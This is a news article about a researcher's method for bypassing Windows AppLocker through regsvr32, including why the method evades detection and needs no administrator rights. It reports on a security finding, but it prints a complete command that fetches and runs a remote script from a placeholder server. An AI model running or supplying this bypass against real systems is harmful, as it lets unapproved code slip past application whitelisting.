Researcher finds way to bypass AppLocker restrictions in Windows

The American security researcher Casey Smith has published in a blog post that the Windows software AppLocker can be easily circumvented. This makes it possible, for example, to run programs that are not allowed by AppLocker.

AppLocker makes it possible to set the use of programs per user and thus limit the execution of certain applications, among other things. The software is present in Windows 7 and above. Smith found that the security can be circumvented by the program regsvr32. This normally causes, for example, dll files to be registered in the Windows registry. Smith discovered the method when he wanted to run an application on a workstation that restricted certain actions with AppLocker.

Bypassing the security works because regsvr32 accepts scripts in the form of a url. This fact, according to Smith, is known to few and has a number of advantages: “The great thing is that regsvr32 uses a proxy present, uses tls and follows redirects. It is also a signed standard Windows binary.” To run a script, it is only necessary that it is present in a location that the user manages, Smith adds. He has created a proof of concept to illustrate.

The researcher indicates that the necessary code is very short and would fit in a tweet if necessary. The command takes this form: regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll, where the sct file contains the script to run. It is also possible to use other extensions, for example an xml file with javascript, as The Register shows. An additional aspect is that with this technique no COM object is included in the register and that this is partly because of this difficult to determine. In addition, no administrator access is required to run the command. There is currently no patch from Microsoft available.